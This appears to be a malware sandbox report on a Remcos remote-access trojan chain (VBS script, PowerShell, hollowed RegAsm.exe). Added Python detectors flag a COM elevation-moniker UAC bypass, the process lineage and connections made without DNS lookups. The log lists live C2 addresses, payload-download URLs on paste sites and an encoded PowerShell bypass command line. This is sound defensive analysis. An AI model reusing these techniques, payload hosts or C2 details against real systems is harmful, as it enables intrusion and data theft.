                    Source: Yara match | File source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR

                    Privilege Escalation

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 20_2_00407538 _wcslen,CoGetObject
                    Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49713 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 173.231.247.100:443 -> 192.168.2.6:49719 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49724 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49728 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49732 version: TLS 1.2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 20_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 20_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 20_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 20_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 20_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 20_2_00407877 FindFirstFileW,FindNextFileW
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 20_2_0044E8F9 FindFirstFileExA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 20_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 20_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 20_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 20_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
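The CoGetObject call in function 20_2_00407538 of the injected RegAsm.exe image is what the "bypass UAC (CMSTPLUA)" verdict rests on: CoGetObject with a COM elevation moniker asks Windows to instantiate an auto-elevating COM class without a consent prompt. The moniker is a string, so it can be hunted for in unpacked images and memory dumps such as the 20.2.RegAsm.exe.400000 region listed above. The scanner below is an added example, not the report's or the sandbox's code. The prefix it searches for is the documented Windows elevation moniker syntax; the CLSID in the constructed sample buffer is the publicly documented CMSTPLUA class, which this page does not quote, and the filler bytes are arbitrary.

```python
import re

# Documented Windows COM elevation moniker prefix; the CLSID that follows names the
# auto-elevated class the caller wants CoGetObject to instantiate.
PREFIX = "Elevation:Administrator!new:{"


def elevation_monikers(blob: bytes):
    """Return every CLSID used with the elevation moniker in `blob`, ASCII or UTF-16LE.

    Both encodings are scanned because C/C++ samples store the moniker as a wide
    string while scripts and .NET loaders often carry it narrow. CLSIDs are upper-cased
    so one target is reported the same way however the sample spelled it.
    """
    hits = []
    for enc, guid_char in (("ascii", rb"[0-9A-Fa-f-]"), ("utf-16-le", rb"[0-9A-Fa-f-]\x00")):
        pattern = (re.escape(PREFIX.encode(enc))
                   + b"((?:" + guid_char + b"){36})"      # 32 hex digits plus 4 hyphens
                   + re.escape("}".encode(enc)))
        for m in re.finditer(pattern, blob):
            hits.append(m.group(1).decode(enc).upper())
    return hits


# Constructed sample buffer. CMSTPLUA is the publicly documented CLSID for that class
# (not taken from this page); everything around it is made up for the example.
CMSTPLUA = "3E5FC7F9-9A51-4367-9063-A120244FBEC7"
SAMPLE = (b"\x90" * 8
          + (PREFIX + CMSTPLUA + "}").encode("utf-16-le")        # wide string copy
          + b"\x00" * 4
          + (PREFIX + CMSTPLUA.lower() + "}").encode("ascii")   # narrow, lower-case copy
          + b"Elevation:Administrator!new:{not-a-guid}")         # malformed: must not match

if __name__ == "__main__":
    for clsid in elevation_monikers(SAMPLE):
        print("elevation moniker targets CLSID", clsid)
```

A hit on its own is not proof of a bypass; legitimate elevating shims use the same moniker. It is the combination with the unsigned payload living inside a hollowed RegAsm.exe, as the Yara matches above show, that makes it actionable.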

                    Software Vulnerabilities

                    Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
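The two parent/child entries above describe one lineage: wscript.exe running the .vbs spawns powershell.exe, which starts RegAsm.exe as the host for the injected Remcos image (the Yara matches on 20.2.RegAsm.exe.400000). The script below is an added example, not part of the report, showing how that lineage is detected from process-creation telemetry. The events are constructed in the shape of Sysmon Event ID 1; PID 3796 is the powershell.exe PID the report names, and every other PID and command line is made up. The "RegAsm.exe without an assembly argument" check is a heuristic of this example, not a finding of the report.

```python
import os
import re

# Constructed process-creation events (pid, parent pid, image, command line).
EVENTS = [
    {"pid": 1200, "ppid": 900,  "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 2100, "ppid": 1200, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs"'},
    {"pid": 3796, "ppid": 2100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -EncodedCommand ZQBjAGgAbwA="},
    {"pid": 4444, "ppid": 3796, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'},
    # Benign control: a build script registering a COM assembly the normal way.
    {"pid": 5100, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c build.cmd"},
    {"pid": 5101, "ppid": 5100, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmdline": r"RegAsm.exe /codebase C:\build\MyCom.dll"},
]

# Child-first form of the lineage the report shows: wscript.exe -> powershell.exe -> RegAsm.exe.
SUSPICIOUS_CHAIN = ("regasm.exe", "powershell.exe", "wscript.exe")


def image_name(path):
    """Lower-cased file name of a Windows image path, independent of the host OS."""
    return os.path.basename(path.replace("\\", "/")).lower()


def ancestry(events, pid):
    """Image names from `pid` up to the root, child first; a cycle or unknown parent ends the walk."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def has_arguments(cmdline):
    """True if anything follows the (possibly quoted) executable token."""
    m = re.match(r'\s*(?:"[^"]*"|\S+)\s*(.*)$', cmdline)
    return bool(m and m.group(1).strip())


def findings(events):
    """Pair each suspicious pid with the reason it was flagged."""
    out = []
    for e in events:
        chain = ancestry(events, e["pid"])
        if tuple(chain[:3]) == SUSPICIOUS_CHAIN:
            out.append((e["pid"], "script host -> powershell -> RegAsm.exe process chain"))
        if chain and chain[0] == "regasm.exe" and not has_arguments(e["cmdline"]):
            # RegAsm.exe with nothing to register does no useful work on its own:
            # heuristic for a process started only to be hollowed and injected into.
            out.append((e["pid"], "RegAsm.exe started without an assembly argument"))
    return out


if __name__ == "__main__":
    for pid, why in findings(EVENTS):
        print(pid, why)
```

The benign RegAsm.exe launched from cmd.exe with `/codebase` is not reported, which is the point of checking the whole ancestry and the command line rather than alerting on the image name alone.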

                    Networking

                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49726 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49730 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49734 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49736 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49725 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49735 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49743 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49744 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49746 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49729 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49754 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49745 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49747 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49766 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49772 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49760 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49751 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49767 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49741 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49770 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49737 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49756 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49763 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49739 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49775 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49771 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49762 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49758 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49750 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49759 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49757 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49748 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49740 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49773 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49755 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49776 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49769 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49753 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49764 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49774 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49731 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49749 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49733 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49761 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49765 -> 212.162.149.163:2404
                    Source: Network traffic | Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49713 -> 188.114.97.3:443
                    Source: Network traffic | Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49717 -> 188.114.97.3:443
                    Source: Network traffic | Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49722 -> 188.114.97.3:443
                    Source: Network traffic | Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 173.231.247.100:443 -> 192.168.2.6:49719
                    Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 173.231.247.100:443 -> 192.168.2.6:49719
                    Source: Malware configuration extractor | URLs: 212.162.149.163
                    Source: unknown | DNS query: name: paste.ee
                    Source: unknown | DNS query: name: pastebin.com
                    Source: global traffic | TCP traffic: 191.252.83.213 ports 60509,1,2,60575,60261,21
                    Source: Yara match | File source: 4.2.powershell.exe.1bdb03863b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.powershell.exe.1bdb17aa240.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 18.2.powershell.exe.199619d7e98.2.raw.unpack, type: UNPACKEDPE
                    Source: global traffic | TCP traffic: 192.168.2.6:49712 -> 191.252.83.213:60575
                    Source: global traffic | TCP traffic: 192.168.2.6:49725 -> 212.162.149.163:2404
                    Source: global traffic | HTTP traffic detected: GET /d/RdlsG/0 HTTP/1.1 | Host: paste.ee | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /d/b5xuX/0 HTTP/1.1 | Host: paste.ee
                    Source: global traffic | HTTP traffic detected: GET /wp-includes/customize/css/bd.txt HTTP/1.1 | Host: www.gratitudeseekers.com | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /d/Ga0HE/0 HTTP/1.1 | Host: paste.ee
                    Source: global traffic | HTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1 | Host: pastebin.com | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1 | Host: pastebin.com | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1 | Host: pastebin.com | Connection: Keep-Alive
                    Source: Joe Sandbox View | IP Address: 104.20.4.235
                    Source: Joe Sandbox View | IP Address: 188.114.97.3
                    Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                    Source: Joe Sandbox View | ASN Name: UNREAL-SERVERSUS
                    Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49717 -> 188.114.97.3:443
                    Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49722 -> 188.114.97.3:443
                    Source: unknown | FTP traffic detected: 191.252.83.213:21 -> 192.168.2.6:49711 220 "Servico de FTP da Locaweb"
                    Source: unknown | TCP traffic detected without corresponding DNS query: 212.162.149.163 (reported 50 times, once per check-in connection)
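The entry above is the simplest network indicator in this report: the C2 address 212.162.149.163 is hard-coded in the Remcos configuration, so the implant connects to it without ever resolving a name, while every download host (paste.ee, pastebin.com, www.gratitudeseekers.com, ftp.desckvbrat.com.br) was looked up first. The following Python is an added example, not the sandbox's logic, showing how to reproduce that check from DNS and connection logs. The records are constructed for the example: the names are the ones the report lists as queried, but their pairing to IPs is an assumption (the report only ties paste.ee to 188.114.97.3 through the SID 2841075 alerts), and timestamps are illustrative.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta, timezone

TZ = timezone(timedelta(hours=2))  # the report's +0200 offset


def t(hhmmss):
    """Timestamp on the report's date (2024-10-03) from an HH:MM:SS string."""
    h, m, s = (int(x) for x in hhmmss.split(":"))
    return datetime(2024, 10, 3, h, m, s, tzinfo=TZ)


# Constructed DNS answers (name-to-IP pairing assumed for the example).
DNS = [
    {"ts": t("09:28:05"), "name": "ftp.desckvbrat.com.br",   "ip": "191.252.83.213"},
    {"ts": t("09:28:11"), "name": "paste.ee",                 "ip": "188.114.97.3"},
    {"ts": t("09:28:16"), "name": "www.gratitudeseekers.com", "ip": "173.231.247.100"},
    {"ts": t("09:28:23"), "name": "pastebin.com",             "ip": "104.20.4.235"},
]

# Constructed connection log. Ports are the ones the report shows; the three port 2404
# rows stand in for the 50 check-ins the original entry counts.
CONNS = [
    {"ts": t("09:28:07"), "dst": "191.252.83.213",  "dport": 21},
    {"ts": t("09:28:12"), "dst": "188.114.97.3",    "dport": 443},
    {"ts": t("09:28:18"), "dst": "173.231.247.100", "dport": 443},
    {"ts": t("09:28:24"), "dst": "104.20.4.235",    "dport": 443},
    {"ts": t("09:28:37"), "dst": "212.162.149.163", "dport": 2404},
    {"ts": t("09:28:39"), "dst": "212.162.149.163", "dport": 2404},
    {"ts": t("09:28:42"), "dst": "212.162.149.163", "dport": 2404},
    {"ts": t("09:28:00"), "dst": "104.20.4.235",    "dport": 443},  # before any answer: unexplained
    {"ts": t("09:28:30"), "dst": "192.168.2.1",     "dport": 53},   # local address, ignored
]


def unresolved_connections(dns, conns, window=timedelta(hours=1)):
    """Connections to public IPs that no DNS answer in the `window` before them explains.

    An answer that arrives after the connection does not count: the process had to know
    the address before it connected. Private, loopback and link-local targets are skipped.
    """
    answers = defaultdict(list)
    for rec in dns:
        answers[rec["ip"]].append((rec["ts"], rec["name"]))
    flagged = []
    for c in conns:
        if not ipaddress.ip_address(c["dst"]).is_global:
            continue
        explained = [name for ts, name in answers.get(c["dst"], [])
                     if ts <= c["ts"] <= ts + window]
        if not explained:
            flagged.append({**c, "reason": "no prior DNS answer for destination"})
    return flagged


def summarize(flagged):
    """Count flagged connections per (destination IP, port)."""
    counts = defaultdict(int)
    for f in flagged:
        counts[(f["dst"], f["dport"])] += 1
    return dict(counts)


if __name__ == "__main__":
    for (dst, dport), n in summarize(unresolved_connections(DNS, CONNS)).items():
        print(f"{dst}:{dport}  {n} connection(s) without a preceding DNS answer")
```

Run against real telemetry this needs the DNS answers seen by the same host (passive DNS or resolver logs), and the time window should match your resolver TTL policy; a host with a long-lived cache entry will otherwise show up as a false positive.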
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 20_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
                    Source: global trafficHTTP traffic detected: GET /d/RdlsG/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /d/b5xuX/0 HTTP/1.1Host: paste.ee
                    Source: global trafficHTTP traffic detected: GET /wp-includes/customize/css/bd.txt HTTP/1.1Host: www.gratitudeseekers.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /d/Ga0HE/0 HTTP/1.1Host: paste.ee
                    Source: global traffic; HTTP traffic detected: GET /raw/pQQ0n3eA HTTP/1.1; Host: pastebin.com; Connection: Keep-Alive
                    Source: global traffic; DNS traffic detected: DNS query: ftp.desckvbrat.com.br
                    Source: global traffic; DNS traffic detected: DNS query: paste.ee
                    Source: global traffic; DNS traffic detected: DNS query: www.gratitudeseekers.com
                    Source: global traffic; DNS traffic detected: DNS query: pastebin.com
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB161F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16C8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://desckvbrat.com.br
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB161F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDB16C8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ftp.desckvbrat.com.br
                    Source: RegAsm.exe; String found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB19AA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://gratitudeseekers.com
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3016225827.000001BDBFF8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2756972243.000001ABF1B4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2656723724.000001C11006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2258056949.0000015EB7B7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318228940.0000015EC6219000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318228940.0000015EC6350000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB1675000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://paste.ee
                    Source: powershell.exe, 0000000D.00000002.2368812441.000001EB4D7FD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pastebin.com
                    Source: powershell.exe, 00000008.00000002.2258056949.0000015EB7A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2258056949.0000015EB7674000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000005.00000002.2283194941.000001ABE1D02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2273102577.000001C100222000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000002.00000002.3114097341.0000025100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDAFF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2283194941.000001ABE1AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2273102577.000001C100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2258056949.0000015EB61A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2368812441.000001EB4D351000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000005.00000002.2283194941.000001ABE1D02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2273102577.000001C100222000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000008.00000002.2258056949.0000015EB7674000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: powershell.exe, 00000008.00000002.2258056949.0000015EB7A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2258056949.0000015EB7674000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000004.00000002.2341736438.000001BDB19AA000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.gratitudeseekers.com
                    Source: powershell.exe, 00000008.00000002.2365489324.0000015ECE77E000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.coE
                    Source: powershell.exe, 00000002.00000002.3114097341.0000025100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2341736438.000001BDAFF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2283194941.000001ABE1AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2273102577.000001C100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2258056949.0000015EB61A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2368812441.000001EB4D351000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
